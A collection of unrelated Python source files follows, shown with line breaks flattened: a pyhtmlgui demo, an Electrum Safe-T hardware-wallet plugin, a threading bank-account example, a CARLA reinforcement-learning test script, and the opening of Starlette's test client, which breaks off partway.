import time import threading import random from pyhtmlgui import PyHtmlGui, PyHtmlView, Observable class App(Observable): def __init__(self): super().__init__() self.app_identifier = random.randint(0,100000) self.app_value = self.app_identifier self.connected_view_feedback = {} self.worker_thread = threading.Thread(target=self._worker_thread, daemon=True) self.worker_thread.start() def _worker_thread(self): while True: self.app_value += 1 self.notifyObservers() time.sleep(1) class AppView(PyHtmlView): TEMPLATE_STR = ''' if you set shared_instance = True, there will only one appview for all connected clients, so if you open multiple browser windows you will see the AppView id is the same in all views and all views show exacly the same. if you use shared_instance = false (the default) every connected frontend gets its own session<br> AppView: {{ this.appview_identifier }}, {{ this.appview_value }}<br> App: {{ this.observedObject.app_identifier }}, {{ this.observedObject.app_value }}<br> Connected frontend feedback: {{ this.connected_frontend_feedback }} Connected AppView feedback: {{ this.observedObject.connected_view_feedback }} ''' def __init__(self, observedObject, parentView): super().__init__(observedObject, parentView) self.appview_identifier = random.randint(0,100000) self.appview_value = self.appview_identifier self.worker_thread = threading.Thread(target=self._worker_thread, daemon=True) self.worker_thread.start() self.connected_frontend_feedback = [] def _worker_thread(self): while True: self.appview_value += 1 if self.is_visible is True: # if we call update ourself, we need to check visibility, we cant update invisible components. self.update() self.call_javascript("get_frontend_id",[])(self._frontend_feedback) time.sleep(1) def _frontend_feedback(self, values): # values containes results from all connected frontends, self.observedObject.connected_view_feedback[self.appview_identifier] = values self.connected_frontend_feedback = values if __name__ == "__main__": gui = PyHtmlGui( appInstance = App(), appViewClass = AppView, auto_reload = True, static_dir = "static", template_dir = "templates", main_html = "window.html", shared_secret = None, single_instance = False, # ) gui.start(show_frontend=True, block=True)
safe_t.py
from binascii import hexlify, unhexlify import traceback import sys from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException from electrum.bip32 import BIP32Node from electrum import constants from electrum.i18n import _ from electrum.plugin import Device, runs_in_hwd_thread from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput from electrum.keystore import Hardware_KeyStore from electrum.base_wizard import ScriptTypeNotSupported from ..hw_wallet import HW_PluginBase from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data, get_xpubs_and_der_suffixes_from_txinout) if TYPE_CHECKING: from .client import SafeTClient # Safe-T mini initialization methods TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4) class SafeTKeyStore(Hardware_KeyStore): hw_type = 'safe_t' device = 'Safe-T mini' plugin: 'SafeTPlugin' def get_client(self, force_pair=True): return self.plugin.get_client(self, force_pair) def decrypt_message(self, sequence, message, password): raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device)) @runs_in_hwd_thread def sign_message(self, sequence, message, password, *, script_type=None): client = self.get_client() address_path = self.get_derivation_prefix() + "/%d/%d"%sequence address_n = client.expand_path(address_path) msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message) return msg_sig.signature @runs_in_hwd_thread def sign_transaction(self, tx, password): if tx.is_complete(): return # previous transactions used as inputs prev_tx = {} for txin in tx.inputs(): tx_hash = txin.prevout.txid.hex() if txin.utxo is None and not txin.is_segwit(): raise UserFacingException(_('Missing previous tx for legacy input.')) prev_tx[tx_hash] = txin.utxo self.plugin.sign_transaction(self, tx, prev_tx) class SafeTPlugin(HW_PluginBase): # Derived classes provide: # # class-static variables: client_class, firmware_URL, handler_class, # libraries_available, libraries_URL, minimum_firmware, # wallet_class, types firmware_URL = 'https://safe-t.io' libraries_URL = 'https://github.com/archos-safe-t/python-safet' minimum_firmware = (1, 0, 5) keystore_class = SafeTKeyStore minimum_library = (0, 1, 0) SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh') MAX_LABEL_LEN = 32 def __init__(self, parent, config, name): HW_PluginBase.__init__(self, parent, config, name) self.libraries_available = self.check_libraries_available() if not self.libraries_available: return from . import client from . import transport import safetlib.messages self.client_class = client.SafeTClient self.types = safetlib.messages self.DEVICE_IDS = ('Safe-T mini',) self.transport_handler = transport.SafeTTransport() self.device_manager().register_enumerate_func(self.enumerate) def get_library_version(self): import safetlib try: return safetlib.__version__ except AttributeError: return 'unknown' @runs_in_hwd_thread def enumerate(self): devices = self.transport_handler.enumerate_devices() return [Device(path=d.get_path(), interface_number=-1, id_=d.get_path(), product_key='Safe-T mini', usage_page=0, transport_ui_string=d.get_path()) for d in devices] @runs_in_hwd_thread def create_client(self, device, handler): try: self.logger.info(f"connecting to device at {device.path}") transport = self.transport_handler.get_transport(device.path) except BaseException as e: self.logger.info(f"cannot connect at {device.path} {e}") return None if not transport: self.logger.info(f"cannot connect at {device.path}") return self.logger.info(f"connected to device at {device.path}") client = self.client_class(transport, handler, self) # Try a ping for device sanity try: client.ping('t') except BaseException as e: self.logger.info(f"ping failed {e}") return None if not client.atleast_version(*self.minimum_firmware): msg = (_('Outdated {} firmware for device labelled {}. Please ' 'download the updated firmware from {}') .format(self.device, client.label(), self.firmware_URL)) self.logger.info(msg) if handler: handler.show_error(msg) else: raise UserFacingException(msg) return None return client @runs_in_hwd_thread def get_client(self, keystore, force_pair=True, *, devices=None, allow_user_interaction=True) -> Optional['SafeTClient']: client = super().get_client(keystore, force_pair, devices=devices, allow_user_interaction=allow_user_interaction) # returns the client for a given keystore. can use xpub if client: client.used() return client def get_coin_name(self): return "Testnet" if constants.net.TESTNET else "Particl" def initialize_device(self, device_id, wizard, handler): # Initialization method msg = _("Choose how you want to initialize your {}.\n\n" "The first two methods are secure as no secret information " "is entered into your computer.\n\n" "For the last two methods you input secrets on your keyboard " "and upload them to your {}, and so you should " "only do those on a computer you know to be trustworthy " "and free of malware." ).format(self.device, self.device) choices = [ # Must be short as QT doesn't word-wrap radio button text (TIM_NEW, _("Let the device generate a completely new seed randomly")), (TIM_RECOVER, _("Recover from a seed you have previously written down")), (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")), (TIM_PRIVKEY, _("Upload a master private key")) ] def f(method): import threading settings = self.request_safe_t_init_settings(wizard, method, self.device) t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler)) t.setDaemon(True) t.start() exit_code = wizard.loop.exec_() if exit_code != 0: # this method (initialize_device) was called with the expectation # of leaving the device in an initialized state when finishing. # signal that this is not the case: raise UserCancelled() wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f) def _initialize_device_safe(self, settings, method, device_id, wizard, handler): exit_code = 0 try: self._initialize_device(settings, method, device_id, wizard, handler) except UserCancelled: exit_code = 1 except BaseException as e: self.logger.exception('') handler.show_error(repr(e)) exit_code = 1 finally: wizard.loop.exit(exit_code) @runs_in_hwd_thread def _initialize_device(self, settings, method, device_id, wizard, handler): item, label, pin_protection, passphrase_protection = settings if method == TIM_RECOVER: handler.show_error(_( "You will be asked to enter 24 words regardless of your " "seed's actual length. If you enter a word incorrectly or " "misspell it, you cannot change it or go back - you will need " "to start again from the beginning.\n\nSo please enter " "the words carefully!"), blocking=True) language = 'english' devmgr = self.device_manager() client = devmgr.client_by_id(device_id) if not client: raise Exception(_("The device was disconnected.")) if method == TIM_NEW: strength = 64 * (item + 2) # 128, 192 or 256 u2f_counter = 0 skip_backup = False client.reset_device(True, strength, passphrase_protection, pin_protection, label, language, u2f_counter, skip_backup) elif method == TIM_RECOVER: word_count = 6 * (item + 2) # 12, 18 or 24 client.step = 0 client.recovery_device(word_count, passphrase_protection, pin_protection, label, language) elif method == TIM_MNEMONIC: pin = pin_protection # It's the pin, not a boolean client.load_device_by_mnemonic(str(item), pin, passphrase_protection, label, language) else: pin = pin_protection # It's the pin, not a boolean client.load_device_by_xprv(item, pin, passphrase_protection, label, language) def _make_node_path(self, xpub, address_n): bip32node = BIP32Node.from_xkey(xpub) node = self.types.HDNodeType( depth=bip32node.depth, fingerprint=int.from_bytes(bip32node.fingerprint, 'big'), child_num=int.from_bytes(bip32node.child_number, 'big'), chain_code=bip32node.chaincode, public_key=bip32node.eckey.get_public_key_bytes(compressed=True), ) return self.types.HDNodePathType(node=node, address_n=address_n) def setup_device(self, device_info, wizard, purpose): device_id = device_info.device.id_ client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard) if not device_info.initialized: self.initialize_device(device_id, wizard, client.handler) wizard.run_task_without_blocking_gui( task=lambda: client.get_xpub("m", 'standard')) client.used() return client def get_xpub(self, device_id, derivation, xtype, wizard): if xtype not in self.SUPPORTED_XTYPES: raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device)) client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard) xpub = client.get_xpub(derivation, xtype) client.used() return xpub def get_safet_input_script_type(self, electrum_txin_type: str): if electrum_txin_type in ('p2wpkh', 'p2wsh'): return self.types.InputScriptType.SPENDWITNESS if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'): return self.types.InputScriptType.SPENDP2SHWITNESS if electrum_txin_type in ('p2pkh',): return self.types.InputScriptType.SPENDADDRESS if electrum_txin_type in ('p2sh',): return self.types.InputScriptType.SPENDMULTISIG raise ValueError('unexpected txin type: {}'.format(electrum_txin_type)) def get_safet_output_script_type(self, electrum_txin_type: str): if electrum_txin_type in ('p2wpkh', 'p2wsh'): return self.types.OutputScriptType.PAYTOWITNESS if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'): return self.types.OutputScriptType.PAYTOP2SHWITNESS if electrum_txin_type in ('p2pkh',): return self.types.OutputScriptType.PAYTOADDRESS if electrum_txin_type in ('p2sh',): return self.types.OutputScriptType.PAYTOMULTISIG raise ValueError('unexpected txin type: {}'.format(electrum_txin_type)) @runs_in_hwd_thread def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx): self.prev_tx = prev_tx client = self.get_client(keystore) inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore) outputs = self.tx_outputs(tx, keystore=keystore) signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime, version=tx.version)[0] signatures = [(bh2u(x) + '01') for x in signatures] tx.update_signatures(signatures) @runs_in_hwd_thread def show_address(self, wallet, address, keystore=None): if keystore is None: keystore = wallet.get_keystore() if not self.show_address_helper(wallet, address, keystore): return client = self.get_client(keystore) if not client.atleast_version(1, 0): keystore.handler.show_error(_("Your device firmware is too old")) return deriv_suffix = wallet.get_address_index(address) derivation = keystore.get_derivation_prefix() address_path = "%s/%d/%d"%(derivation, *deriv_suffix) address_n = client.expand_path(address_path) script_type = self.get_safet_input_script_type(wallet.txin_type) # prepare multisig, if available: xpubs = wallet.get_master_public_keys() if len(xpubs) > 1: pubkeys = wallet.get_public_keys(address) # sort xpubs using the order of pubkeys sorted_pairs = sorted(zip(pubkeys, xpubs)) multisig = self._make_multisig( wallet.m, [(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs]) else: multisig = None client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type) def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None): inputs = [] for txin in tx.inputs(): txinputtype = self.types.TxInputType() if txin.is_coinbase_input(): prev_hash = b"\x00"*32 prev_index = 0xffffffff # signed int -1 else: if for_sig: assert isinstance(tx, PartialTransaction) assert isinstance(txin, PartialTxInput) assert keystore if len(txin.pubkeys) > 1: xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin) multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes) else: multisig = None script_type = self.get_safet_input_script_type(txin.script_type) txinputtype = self.types.TxInputType( script_type=script_type, multisig=multisig) my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin) if full_path: txinputtype._extend_address_n(full_path) prev_hash = txin.prevout.txid prev_index = txin.prevout.out_idx if txin.value_sats() is not None: txinputtype.amount = txin.value_sats() txinputtype.prev_hash = prev_hash txinputtype.prev_index = prev_index if txin.script_sig is not None: txinputtype.script_sig = txin.script_sig txinputtype.sequence = txin.nsequence inputs.append(txinputtype) return inputs def _make_multisig(self, m, xpubs): if len(xpubs) == 1: return None pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs] return self.types.MultisigRedeemScriptType( pubkeys=pubkeys, signatures=[b''] * len(pubkeys), m=m) def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'): def create_output_by_derivation(): script_type = self.get_safet_output_script_type(txout.script_type) if len(txout.pubkeys) > 1: xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout) multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes) else: multisig = None my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout) assert full_path txoutputtype = self.types.TxOutputType( multisig=multisig, amount=txout.value, address_n=full_path, script_type=script_type) return txoutputtype def create_output_by_address(): txoutputtype = self.types.TxOutputType() txoutputtype.amount = txout.value if address: txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS txoutputtype.address = address else: txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout) return txoutputtype outputs = [] has_change = False any_output_on_change_branch = is_any_tx_output_on_change_branch(tx) for txout in tx.outputs(): address = txout.address use_create_by_derivation = False if txout.is_mine and not has_change: # prioritise hiding outputs on the 'change' branch from user # because no more than one change address allowed # note: ^ restriction can be removed once we require fw # that has https://github.com/trezor/trezor-mcu/pull/306 if txout.is_change == any_output_on_change_branch: use_create_by_derivation = True has_change = True if use_create_by_derivation: txoutputtype = create_output_by_derivation() else: txoutputtype = create_output_by_address() outputs.append(txoutputtype) return outputs def electrum_tx_to_txtype(self, tx: Optional[Transaction]): t = self.types.TransactionType() if tx is None: # probably for segwit input and we don't need this prev txn return t tx.deserialize() t.version = tx.version t.lock_time = tx.locktime inputs = self.tx_inputs(tx) t._extend_inputs(inputs) for out in tx.outputs(): o = t._add_bin_outputs() o.amount = out.value o.script_pubkey = out.scriptpubkey return t # This function is called from the TREZOR libraries (via tx_api) def get_tx(self, tx_hash): tx = self.prev_tx[tx_hash] return self.electrum_tx_to_txtype(tx)
example6.py
from threading import Thread import threading import time class BankAccount: def __init__(self): self.lock = threading.Lock() self.sufficientBalanceCondition = threading.Condition(self.lock) self.balance = 0 def deposit(self, amount): self.lock.acquire() try: newBalance = self.balance + amount self.balance = newBalance print("Depositing: %d, new balance is %d" % (amount, newBalance)) self.sufficientBalanceCondition.notifyAll() finally: self.lock.release() def withdraw(self, amount): self.lock.acquire() try: while(self.balance < amount): self.sufficientBalanceCondition.wait() newBalance = self.balance - amount self.balance = newBalance print("Withdrawing: %d, new balance is %d" % (amount, newBalance)) finally: self.lock.release() def getBalance(self): return self.balance def triggerDeposits(bankAccount, amount, count): print("In here") for i in range(count): bankAccount.deposit(amount) # time.sleep(1) def triggerWithdraws(bankAccount, amount, count): for i in range(count): bankAccount.withdraw(amount) # time.sleep(1) if __name__ == '__main__': bAcct = BankAccount() amount = 100 repetitions = 100 threads = 100 for i in range(threads): t1 = Thread(target=triggerDeposits, args=(bAcct, amount, repetitions,)) t2 = Thread(target=triggerWithdraws, args=(bAcct, amount, repetitions,)) t1.start() t2.start()
test.py
# Load the trained model # Test it on the seen and unseen environment # # Seen environment - (X, Y) = (143.5, 207.0) # Unseen envioronment - (X, Y) = from keras.models import load_model import glob import os import sys import random import time import numpy as np import cv2 import math from collections import deque from keras.applications.xception import Xception from keras.layers import Dense, GlobalAveragePooling2D from keras.optimizers import Adam from keras.models import Model from keras.callbacks import TensorBoard import tensorflow as tf import keras.backend.tensorflow_backend as backend #from tensorflow.keras import backend from threading import Thread from tqdm import tqdm ''' try: sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % ( sys.version_info.major, sys.version_info.minor, 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0]) except IndexError: pass ''' #sys.path.append() import carla SHOW_PREVIEW = False IM_WIDTH = 320 IM_HEIGHT = 240 SECONDS_PER_EPISODE = 10 REPLAY_MEMORY_SIZE = 5000 MIN_REPLAY_MEMORY_SIZE = 1000 MINIBATCH_SIZE = 4 PREDICTION_BATCH_SIZE = 1 TRAINING_BATCH_SIZE = MINIBATCH_SIZE // 4 UPDATE_TARGET_EVERY = 5 MODEL_NAME = "Xception" DATE = "NOV28" MEMORY_FRACTION = 1.0 MIN_REWARD = -200 EPISODES = 10 DISCOUNT = 0.99 epsilon = 0.0 EPSILON_DECAY = 0.95 ## 0.9975 99975 MIN_EPSILON = 0.001 AGGREGATE_STATS_EVERY = 10 #SEEN_ENV_X = 65.6 # For straight road - seen env #SEEN_ENV_Y = 4.3 # For straight road - seen env #SEEN_YAW = 0.0 # For straight road - seen env SEEN_ENV_X = -74.5 SEEN_ENV_Y = -148.4 SEEN_YAW = -88.0 #UNSEEN_ENV_X = -77.5 #UNSEEN_ENV_Y = 112.2 #UNSEEN_ENV_X = -77.9 #UNSEEN_ENV_Y = -8.1 UNSEEN_ENV_X = -149.0 UNSEEN_ENV_Y = 76.3 UNSEEN_YAW = 90 # Own Tensorboard class class ModifiedTensorBoard(TensorBoard): # Overriding init to set initial step and writer (we want one log file for all .fit() calls) def __init__(self, **kwargs): super().__init__(**kwargs) self.step = 1 self.writer = tf.summary.FileWriter(self.log_dir) # Overriding this method to stop creating default log writer def set_model(self, model): pass # Overrided, saves logs with our step number # (otherwise every .fit() will start writing from 0th step) def on_epoch_end(self, epoch, logs=None): self.update_stats(**logs) # Overrided # We train for one batch only, no need to save anything at epoch end def on_batch_end(self, batch, logs=None): pass # Overrided, so won't close writer def on_train_end(self, _): pass # Custom method for saving own metrics # Creates writer, writes custom metrics and closes writer def update_stats(self, **stats): self._write_logs(stats, self.step) class CarEnv: SHOW_CAM = SHOW_PREVIEW STEER_AMT = 1.0 im_width = IM_WIDTH im_height = IM_HEIGHT front_camera = None def __init__(self): self.client = carla.Client("localhost", 2000) self.client.set_timeout(2.0) self.world = self.client.get_world() self.blueprint_library = self.world.get_blueprint_library() self.model_3 = self.blueprint_library.filter("model3")[0] def reset(self): self.collision_hist = [] self.actor_list = [] random_spawn_point = random.choice(self.world.get_map().get_spawn_points()) #print(random_spawn_point) #self.transform = random.choice(self.world.get_map().get_spawn_points()) #self.transform = carla.Transform(carla.Location(x=65.6, y=4.3), carla.Rotation(yaw=0)) self.transform = carla.Transform(carla.Location(x=UNSEEN_ENV_X, y=UNSEEN_ENV_Y), carla.Rotation(yaw=UNSEEN_YAW)) self.vehicle = self.world.spawn_actor(self.model_3, self.transform) self.actor_list.append(self.vehicle) self.rgb_cam = self.blueprint_library.find('sensor.camera.rgb') #self.rgb_cam.set_attribute("image_size_x", self.im_width) #self.rgb_cam.set_attribute("image_size_y", self.im_height) #self.rgb_cam.set_attribute("fov", 110) self.rgb_cam.set_attribute("image_size_x", f"{self.im_width}") self.rgb_cam.set_attribute("image_size_y", f"{self.im_height}") self.rgb_cam.set_attribute("fov", f"110") transform = carla.Transform(carla.Location(x=2.5, z=0.7)) self.sensor = self.world.spawn_actor(self.rgb_cam, transform, attach_to=self.vehicle) self.actor_list.append(self.sensor) self.sensor.listen(lambda data: self.process_img(data)) self.vehicle.apply_control(carla.VehicleControl(throttle=0.0, brake=0.0)) time.sleep(4) colsensor = self.blueprint_library.find("sensor.other.collision") self.colsensor = self.world.spawn_actor(colsensor, transform, attach_to=self.vehicle) self.actor_list.append(self.colsensor) self.colsensor.listen(lambda event: self.collision_data(event)) while self.front_camera is None: time.sleep(0.01) self.episode_start = time.time() self.vehicle.apply_control(carla.VehicleControl(throttle=0.0, brake=0.0)) return self.front_camera def collision_data(self, event): self.collision_hist.append(event) def process_img(self, image): i = np.array(image.raw_data) #print(i.shape) i2 = i.reshape((self.im_height, self.im_width, 4)) i3 = i2[:, :, :3] if self.SHOW_CAM: cv2.imshow("", i3) cv2.waitKey(1) self.front_camera = i3 def step(self, action): if action == 0: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=-1*self.STEER_AMT)) elif action == 1: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer= 0)) elif action == 2: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=1*self.STEER_AMT)) elif action == 3: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=-0.5*self.STEER_AMT)) elif action == 4: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=0.5*self.STEER_AMT)) v = self.vehicle.get_velocity() kmh = int(3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)) if len(self.collision_hist) != 0: done = True reward = -200 elif kmh < 50: done = False reward = -1 else: done = False reward = 1 if self.episode_start + SECONDS_PER_EPISODE < time.time(): done = True return self.front_camera, reward, done, None class DQNAgent: def __init__(self): #self.model = self.create_model() self.model = load_model("/home/kishor/GWM/Github_Repos/Carla-RL-Sentdex/KK/5_Action_Space/models/Xception__-216.00max_-226.90avg_-238.00min__1574966396.model") self.target_model = load_model("/home/kishor/GWM/Github_Repos/Carla-RL-Sentdex/KK/5_Action_Space/models/Xception__-216.00max_-226.90avg_-238.00min__1574966396.model") #self.target_model = self.create_model() #self.target_model.set_weights(self.model.get_weights()) self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE) #self.tensorboard = ModifiedTensorBoard(log_dir="logs/{MODEL_NAME}-{int(time.time())}") self.tensorboard = ModifiedTensorBoard(log_dir="logs/check") self.target_update_counter = 0 self.graph = tf.get_default_graph() self.terminate = False self.last_logged_episode = 0 self.training_initialized = False def create_model(self): base_model = Xception(weights=None, include_top=False, input_shape=(IM_HEIGHT, IM_WIDTH,3)) x = base_model.output x = GlobalAveragePooling2D()(x) predictions = Dense(3, activation="linear")(x) model = Model(inputs=base_model.input, outputs=predictions) model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=["accuracy"]) return model def update_replay_memory(self, transition): # transition = (current_state, action, reward, new_state, done) self.replay_memory.append(transition) def train(self): if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE: return minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE) current_states = np.array([transition[0] for transition in minibatch])/255 with self.graph.as_default(): current_qs_list = self.model.predict(current_states, PREDICTION_BATCH_SIZE) new_current_states = np.array([transition[3] for transition in minibatch])/255 with self.graph.as_default(): future_qs_list = self.target_model.predict(new_current_states, PREDICTION_BATCH_SIZE) X = [] y = [] for index, (current_state, action, reward, new_state, done) in enumerate(minibatch): if not done: max_future_q = np.max(future_qs_list[index]) new_q = reward + DISCOUNT * max_future_q else: new_q = reward current_qs = current_qs_list[index] current_qs[action] = new_q X.append(current_state) y.append(current_qs) log_this_step = False if self.tensorboard.step > self.last_logged_episode: log_this_step = True self.last_log_episode = self.tensorboard.step with self.graph.as_default(): self.model.fit(np.array(X)/255, np.array(y), batch_size=TRAINING_BATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if log_this_step else None) if log_this_step: self.target_update_counter += 1 if self.target_update_counter > UPDATE_TARGET_EVERY: self.target_model.set_weights(self.model.get_weights()) self.target_update_counter = 0 def get_qs(self, state): return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0] def train_in_loop(self): X = np.random.uniform(size=(1, IM_HEIGHT, IM_WIDTH, 3)).astype(np.float32) y = np.random.uniform(size=(1, 3)).astype(np.float32) with self.graph.as_default(): self.model.fit(X,y, verbose=False, batch_size=1) self.training_initialized = True while True: if self.terminate: return self.train() time.sleep(0.01) if __name__ == '__main__': FPS = 10 # For stats ep_rewards = [-200] # For more repetitive results random.seed(1) np.random.seed(1) tf.set_random_seed(1) # Memory fraction, used mostly when trai8ning multiple agents gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION) backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))) # Create models folder if not os.path.isdir('models'): os.makedirs('models') # Create agent and environment agent = DQNAgent() env = CarEnv() # Start training thread and wait for training to be initialized #trainer_thread = Thread(target=agent.train_in_loop, daemon=True) #trainer_thread.start() #while not agent.training_initialized: # time.sleep(0.01) # Initialize predictions - forst prediction takes longer as of initialization that has to be done # It's better to do a first prediction then before we start iterating over episode steps agent.get_qs(np.ones((env.im_height, env.im_width, 3))) # Iterate over episodes for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'): #try: env.collision_hist = [] # Update tensorboard step every episode agent.tensorboard.step = episode # Restarting episode - reset episode reward and step number episode_reward = 0 step = 1 # Reset environment and get initial state current_state = env.reset() # Reset flag and start iterating until episode ends done = False episode_start = time.time() # Play for given number of seconds only while True: # This part stays mostly the same, the change is to query a model for Q values if np.random.random() > epsilon: # Get action from Q table action = np.argmax(agent.get_qs(current_state)) print("Lets take action :{}".format(action)) else: # Get random action #action = np.random.randint(0, 3) # This takes no time, so we add a delay matching 60 FPS (prediction above takes longer) time.sleep(1/FPS) new_state, reward, done, _ = env.step(action) # Transform new continous state to new discrete state and count reward episode_reward += reward # Every step we update replay memory agent.update_replay_memory((current_state, action, reward, new_state, done)) current_state = new_state step += 1 if done: break # save episode rewards # End of episode - destroy agents for actor in env.actor_list: actor.destroy() # Append episode reward to a list and log stats (every given number of episodes) ep_rewards.append(episode_reward) if not episode % AGGREGATE_STATS_EVERY or episode == 1: average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:]) min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:]) max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:]) agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon) # Save model, but only when min reward is greater or equal a set value #if min_reward >= MIN_REWARD: # agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model') # print("Did I save the model?") # #agent.model.save("check.model") # Decay epsilon if epsilon > MIN_EPSILON: epsilon *= EPSILON_DECAY epsilon = max(MIN_EPSILON, epsilon) # save ep_rewards list to a excel sheet with open("reward_file.txt", "w") as rfile: for item in ep_rewards: print(item) rfile.write(str(item)) rfile.write("\n") # Set termination flag for training thread and wait for it to finish agent.terminate = True trainer_thread.join() #agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
testclient.py
import asyncio import http import inspect import io import json import queue import threading import types import typing from urllib.parse import unquote, urljoin, urlsplit import requests from starlette.types import Message, Receive, Scope, Send from starlette.websockets import WebSocketDisconnect # Annotations for `Session.request()` Cookies = typing.Union[ typing.MutableMapping[str, str], requests.cookies.RequestsCookieJar ] Params = typing.Union[bytes, typing.MutableMapping[str, str]] DataType = typing.Union[bytes, typing.MutableMapping[str, str], typing.IO] TimeOut = typing.Union[float, typing.Tuple[float, float]] FileType = typing.MutableMapping[str, typing.IO] AuthType = typing.Union[ typing.Tuple[str, str], requests.auth.AuthBase, typing.Callable[[requests.Request], requests.Request], ] ASGIInstance = typing.Callable[[Receive, Send], typing.Awaitable[None]] ASGI2App = typing.Callable[[Scope], ASGIInstance] ASGI3App = typing.Callable[[Scope, Receive, Send], typing.Awaitable[None]] class _HeaderDict(requests.packages.urllib3._collections.HTTPHeaderDict): def get_all(self, key: str, default: str) -> str: return self.getheaders(key) class _MockOriginalResponse: """ We have to jump through some hoops to present the response as if it was made using urllib3. """ def __init__(self, headers: typing.List[typing.Tuple[bytes, bytes]]) -> None: self.msg = _HeaderDict(headers) self.closed = False def isclosed(self) -> bool: return self.closed class _Upgrade(Exception): def __init__(self, session: "WebSocketTestSession") -> None: self.session = session def _get_reason_phrase(status_code: int) -> str: try: return http.HTTPStatus(status_code).phrase except ValueError: return "" def _is_asgi3(app: typing.Union[ASGI2App, ASGI3App]) -> bool: if inspect.isclass(app): return hasattr(app, "__await__") elif inspect.isfunction(app): return asyncio.iscoroutinefunction(app) call = getattr(app, "__call__", None) return asyncio.iscoroutinefunction(call) class _WrapASGI2: """ Provide an ASGI3 interface onto an ASGI2 app. """ def __init__(self, app: ASGI2App) -> None: self.app = app async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: instance = self.app(scope) await instance(receive, send) class _ASGIAdapter(requests.adapters.HTTPAdapter): def __init__( self, app: ASGI3App, raise_server_exceptions: bool = True, root_path: str = "" ) -> None: self.app = app self.raise_server_exceptions = raise_server_exceptions self.root_path = root_path def send( self, request: requests.PreparedRequest, *args: typing.Any, **kwargs: typing.Any ) -> requests.Response: scheme, netloc, path, query, fragment = ( str(item) for item in urlsplit(request.url) ) default_port = {"http": 80, "ws": 80, "https": 443, "wss": 443}[scheme] if ":" in netloc: host, port_string = netloc.split(":", 1) port = int(port_string) else: host = netloc port = default_port # Include the 'host' header. if "host" in request.headers: headers = [] # type: typing.List[typing.Tuple[bytes, bytes]] elif port == default_port: headers = [(b"host", host.encode())] else: headers = [(b"host", (f"{host}:{port}").encode())] # Include other request headers. headers += [ (key.lower().encode(), value.encode()) for key, value in request.headers.items() ] if scheme in {"ws", "wss"}: subprotocol = request.headers.get("sec-websocket-protocol", None) if subprotocol is None: subprotocols = [] # type: typing.Sequence[str] else: subprotocols = [value.strip() for value in subprotocol.split(",")] scope = { "type": "websocket", "path": unquote(path), "root_path": self.root_path, "scheme": scheme, "query_string": query.encode(), "headers": headers, "client": ["testclient", 50000], "server": [host, port], "subprotocols": subprotocols, } session = WebSocketTestSession(self.app, scope) raise _Upgrade(session) scope = { "type": "http", "http_version": "1.1", "method": request.method, "path": unquote(path), "root_path": self.root_path, "scheme": scheme, "query_string": query.encode(), "headers": 